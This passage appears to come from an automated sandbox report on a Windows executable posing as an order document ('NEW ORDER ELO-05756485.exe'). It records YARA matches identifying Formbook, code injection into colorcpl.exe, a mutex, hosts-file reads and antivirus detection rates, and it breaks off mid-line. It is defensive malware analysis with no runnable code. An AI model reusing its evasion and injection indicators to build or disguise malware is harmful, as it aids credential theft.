          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01336E302_2_01336E30
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DD6162_2_013DD616
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E2EF72_2_013E2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045ED4668_2_045ED466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453841F8_2_0453841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F1D558_2_045F1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F2D078_2_045F2D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04520D208_2_04520D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F25DD8_2_045F25DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453D5E08_2_0453D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045525818_2_04552581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045ED6168_2_045ED616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04546E308_2_04546E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F2EF78_2_045F2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045FDFCE8_2_045FDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F1FF18_2_045F1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E10028_2_045E1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045FE8248_2_045FE824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F28EC8_2_045F28EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453B0908_2_0453B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A08_2_045520A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F20A88_2_045F20A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452F9008_2_0452F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045441208_2_04544120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F22AE8_2_045F22AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F2B288_2_045F2B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E03DA8_2_045E03DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EDBD28_2_045EDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455EBB08_2_0455EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255E1B58_2_0255E1B5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02549E408_2_02549E40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02549E3C8_2_02549E3C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02542FB08_2_02542FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255E4288_2_0255E428
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02542D908_2_02542D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: String function: 0131B150 appears 72 times
          Source: NEW ORDER ELO-05756485.exeBinary or memory string: OriginalFilename vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.351832870.0000000000B88000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exeBinary or memory string: OriginalFilename vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393412768.00000000012C3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393948133.000000000159F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exeBinary or memory string: OriginalFilenamePackingSize.exeB vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NEW ORDER ELO-05756485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER ELO-05756485.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeMutant created: \Sessions\1\BaseNamedObjects\eOVZmXVdxEDwjESg
          Source: NEW ORDER ELO-05756485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: NEW ORDER ELO-05756485.exeVirustotal: Detection: 37%
          Source: NEW ORDER ELO-05756485.exeReversingLabs: Detec